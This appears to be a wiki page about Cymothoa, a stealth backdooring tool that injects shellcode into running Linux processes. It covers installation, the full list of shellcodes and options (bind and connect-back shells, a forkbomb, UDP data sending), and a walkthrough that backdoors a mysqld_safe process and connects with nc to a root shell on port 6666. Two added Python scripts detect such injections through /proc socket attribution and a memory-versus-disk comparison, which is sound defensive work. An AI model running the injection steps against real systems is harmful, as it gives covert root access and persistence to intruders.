Cymothoa
Description
Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process.
Installation
Backtrack
Backtrack 5 R2 already comes with Cymothoa installed, in /pentest/backdoors/cymothoa/.
From scratch
$ cd ~/src/
$ wget http://downloads.sourceforge.net/project/cymothoa/cymothoa-1-beta/cymothoa-1-beta.tar.gz
$ tar xzvf cymothoa-1-beta.tar.gz
$ cd cymothoa-1-beta/
$ make
$ sudo make install
Usage
Syntax
cymothoa -p <pid> -s <shellcode_number> [options]
Options
Main options
- -p: process pid
- -s: shellcode number
  - 0 - bind /bin/sh to the provided port (requires -y)
  - 1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <[email protected]>
  - 2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
  - 3 - /bin/sh connect back (requires -x, -y)
  - 4 - tcp socket proxy (requires -x -y -r) - Russell Sanford ([email protected])
  - 5 - script execution (see the payload), creates a tmp file you must remove
  - 6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
  - 7 - serial port busybox binding - [email protected] [email protected]
  - 8 - forkbomb (just for fun...) - Kris Katterjohn
  - 9 - open cd-rom loop (follows /dev/cdrom symlink) - [email protected]
  - 10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs ([email protected])
  - 11 - POC alarm() scheduled shellcode
  - 12 - POC setitimer() scheduled shellcode
  - 13 - alarm() backdoor (requires -j -y) bind port, fork on accept
  - 14 - setitimer() tail follow (requires -k -x -y) send data via udp
- -l: memory region name for shellcode injection (default /lib/ld); search for "r-xp" permissions, see /proc/pid/maps...
- -m: memory region name for persistent memory (default /lib/ld); search for "rw-p" permissions, see /proc/pid/maps...
- -h: print this help screen
- -S: list available shellcodes
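Shellcodes 0, 1, 2 and 13 above bind /bin/sh to a TCP port inside the infected process, so the most visible symptom on the victim is an existing daemon that starts listening on a port it never served. The following Python script is an added example for this page, not part of cymothoa: it parses /proc/net/tcp for LISTEN sockets and attributes each one to a PID by resolving the socket:[N] links under /proc/<pid>/fd. The /proc/net/tcp lines and the inode-to-PID table used for the demo are constructed (the 3306/6666 values mirror the walkthrough below); scan_live_system() reads the real files.

```python
"""Map listening TCP sockets back to their owning process via /proc.

Added example, not cymothoa's code. Sample /proc/net/tcp text and the
SAMPLE_OWNERS inode->pid table are constructed for the demonstration.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

TCP_LISTEN = "0A"                      # value of the "st" column for LISTEN
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")

# Constructed sample: mysqld on 3306 (inode 12345), an unexpected root-owned
# listener on 6666 (inode 67890) and one ESTABLISHED connection to be skipped.
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   105        0 12345 1 00000000 100 0 0 10 0
   1: 00000000:1A0A 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 67890 1 00000000 100 0 0 10 0
   2: 1201A8C0:0CEA 0501A8C0:C3F1 01 00000000:00000000 00:00000000 00000000   105        0 67891 1 00000000 20 4 30 10 -1
"""
SAMPLE_OWNERS = {12345: 1273, 67890: 1155}   # constructed inode -> pid table


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    inode: int
    uid: int


def decode_addr(hexaddr: str) -> Tuple[str, int]:
    """Decode '0100007F:1A0A' -> ('127.0.0.1', 6666).

    The kernel prints the IPv4 address in host byte order; this example
    assumes a little-endian host, so the octets are read back to front.
    """
    ip_hex, port_hex = hexaddr.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0)]
    return ".".join(octets), int(port_hex, 16)


def parse_listeners(tcp_text: str) -> List[Listener]:
    """Return every LISTEN socket from /proc/net/tcp text (header skipped)."""
    out = []
    for line in tcp_text.splitlines()[1:]:
        parts = line.split()
        # Columns: sl local rem st tx:rx tr:when retrnsmt uid timeout inode ...
        if len(parts) < 10 or parts[3] != TCP_LISTEN:
            continue
        addr, port = decode_addr(parts[1])
        out.append(Listener(addr, port, int(parts[9]), int(parts[7])))
    return out


def socket_owners(proc_root: str = "/proc") -> Dict[int, int]:
    """Build inode -> pid by resolving every /proc/<pid>/fd/* 'socket:[N]' link."""
    owners: Dict[int, int] = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        fd_dir = os.path.join(proc_root, entry, "fd")
        try:
            fds = os.listdir(fd_dir)          # readable only for own uid or as root
        except OSError:
            continue
        for fd in fds:
            try:
                m = SOCKET_LINK.match(os.readlink(os.path.join(fd_dir, fd)))
            except OSError:
                continue
            if m:
                owners[int(m.group(1))] = int(entry)
    return owners


def attribute(tcp_text: str, owners: Dict[int, int]) -> List[Tuple[Listener, Optional[int]]]:
    """Pair each listener with its pid (None when no fd table exposed the inode)."""
    return [(lst, owners.get(lst.inode)) for lst in parse_listeners(tcp_text)]


def scan_live_system() -> List[Tuple[Listener, Optional[int]]]:
    with open("/proc/net/tcp") as f:
        return attribute(f.read(), socket_owners())


if __name__ == "__main__":
    for lst, pid in scan_live_system():
        comm = "?"
        if pid is not None:
            try:
                with open(f"/proc/{pid}/comm") as f:
                    comm = f.read().strip()
            except OSError:
                pass
        print(f"{lst.addr}:{lst.port:<5} uid={lst.uid:<5} pid={pid} ({comm})")
```

Run as root for complete attribution; an unprivileged run shows pid=None for sockets owned by other users. A listener attributed to a PID whose command line is a database or logging helper, as in the walkthrough, is what to compare against the service's expected ports. Only IPv4 is covered here; /proc/net/tcp6 has the same column layout with 32-hex-digit addresses.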
Injection options (overwrite payload flags)
- -f: fork parent process
- -F: don't fork parent process
- -b: create payload thread (probably you need also -F)
- -B: don't create payload thread
- -w: pass persistent memory address
- -W: don't pass persistent memory address
- -a: use alarm scheduler
- -A: don't use alarm scheduler
- -t: use setitimer scheduler
- -T: don't use setitimer scheduler
Payload arguments
- -j: set timer (seconds)
- -k: set timer (microseconds)
- -x: set the IP
- -y: set the port number
- -r: set the port number 2
- -z: set the username (4 bytes)
- -o: set the password (8 bytes)
- -c: set the script code (ex: "#!/bin/sh\nls; exit 0"); escape codes will not be interpreted
Usage
First install cymothoa on the victim's computer. Then look up the PID of the process you want to infect (e.g. mysql, PID 1155):
victim:~/src/cymothoa-1-beta# ps aux | grep mysql
root      1155  0.0  0.1   1752   568 ?        S    21:39   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     1273  0.0  4.3 138744 22424 ?        Sl   21:39   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root      1274  0.0  0.1   1676   560 ?        S    21:39   0:00 logger -t mysqld -p daemon.error
root     26975  0.0  0.1   3324   812 pts/0    S+   21:53   0:00 grep mysql
Then infect the process:
victim:~/src/cymothoa-1-beta# ./cymothoa -p 1155 -s 0 -y 6666
[+] attaching to process 1155
 register info:
-----------------------------------------------------------
eax value: 0xfffffe00
ebx value: 0xffffffff
esp value: 0xbfbfaffc
eip value: 0xb7818424
------------------------------------------------------------
[+] new esp: 0xbfbfaff8
[+] payload preamble: fork
[+] injecting code into 0xb7819000
[+] copy general purpose registers
[+] detaching from 1155
[+] infected!!!
On the attacker's machine, you should now be able to connect to port 6666:
root@bt:/pentest/backdoors/cymothoa# nc 192.168.1.18 6666
id
uid=0(root) gid=0(root) groups=0(root)
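The injection above lands at 0xb7819000, inside the "r-xp" mapping of /lib/ld that -l selects by default. Because that mapping is backed by a file, the durable trace it leaves is a page of executable memory that no longer matches the library on disk. The following Python script is an added example for this page, not cymothoa's own code: it parses /proc/<pid>/maps, and for every file-backed executable mapping reads the live bytes from /proc/<pid>/mem and compares them page by page with the backing file at the recorded offset. The SAMPLE_MAPS text is constructed in the layout of the 32-bit victim shown above; scan_pid() works on a real process.

```python
"""Compare a process's file-backed executable mappings with the files on disk.

Added example, not part of cymothoa. The maps text below is constructed;
scan_pid() reads the real /proc/<pid>/maps and /proc/<pid>/mem.
"""
import re
import sys
from dataclasses import dataclass
from typing import List, Tuple

PAGE_SIZE = 4096

# One /proc/<pid>/maps line: range, perms, file offset, device, inode, path.
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+[0-9a-f]+:[0-9a-f]+\s+\d+\s*(?P<path>.*)$"
)

# Constructed sample modelled on the 32-bit victim in the walkthrough.
SAMPLE_MAPS = """\
08048000-08050000 r-xp 00000000 08:01 654321 /bin/sh
08050000-08051000 rw-p 00008000 08:01 654321 /bin/sh
b7818000-b7833000 r-xp 00000000 08:01 123456 /lib/ld-2.11.so
b7834000-b7835000 rw-p 0001b000 08:01 123456 /lib/ld-2.11.so
b7ffe000-b7fff000 r-xp 00000000 00:00 0 [vdso]
bfbea000-bfbff000 rw-p 00000000 00:00 0 [stack]
"""


@dataclass(frozen=True)
class Mapping:
    start: int
    end: int
    perms: str
    offset: int
    path: str

    @property
    def size(self) -> int:
        return self.end - self.start

    @property
    def is_exec_file(self) -> bool:
        # Executable and backed by a real file (not [vdso], [stack] or anonymous).
        return "x" in self.perms and self.path.startswith("/")


def parse_maps(text: str) -> List[Mapping]:
    """Parse /proc/<pid>/maps text into Mapping records."""
    out = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            out.append(Mapping(int(m["start"], 16), int(m["end"], 16),
                               m["perms"], int(m["offset"], 16), m["path"].strip()))
    return out


def diff_pages(mem: bytes, disk: bytes, page_size: int = PAGE_SIZE) -> List[int]:
    """Indices of pages whose mapped bytes differ from the backing file.

    A mapping may extend past the end of the file; those pages read as
    zeros, so the file image is zero-padded to the mapping length first.
    """
    disk = disk.ljust(len(mem), b"\0")
    return [off // page_size for off in range(0, len(mem), page_size)
            if mem[off:off + page_size] != disk[off:off + page_size]]


def scan_pid(pid: int) -> List[Tuple[Mapping, List[int]]]:
    """Check every file-backed executable mapping of pid against its file.

    Reading /proc/<pid>/mem requires ptrace access to the target (root, or
    the same uid under a permissive kernel.yama.ptrace_scope).
    """
    with open(f"/proc/{pid}/maps") as f:
        maps = parse_maps(f.read())
    findings = []
    with open(f"/proc/{pid}/mem", "rb", buffering=0) as mem:
        for m in maps:
            if not m.is_exec_file:
                continue
            try:
                mem.seek(m.start)
                live = mem.read(m.size)
                with open(m.path, "rb") as f:
                    f.seek(m.offset)
                    disk = f.read(m.size)
            except OSError:
                continue  # "(deleted)" path, unreadable page, etc.
            changed = diff_pages(live, disk)
            if changed:
                findings.append((m, changed))
    return findings


if __name__ == "__main__":
    for m, pages in scan_pid(int(sys.argv[1])):
        first = m.start + pages[0] * PAGE_SIZE
        print(f"{m.path} {m.start:08x}-{m.end:08x} {m.perms}: "
              f"{len(pages)} page(s) differ from disk, first at {first:#x}")
```

Run it as root against the PIDs of long-lived daemons (python3 scan.py 1155). Text segments of position-independent libraries should match the file exactly, so any differing page deserves a look; the known benign causes are binaries with text relocations (TEXTREL), prelinked libraries, and files replaced on disk after the process started. The check says nothing about anonymous executable mappings, which are a separate and simpler indicator.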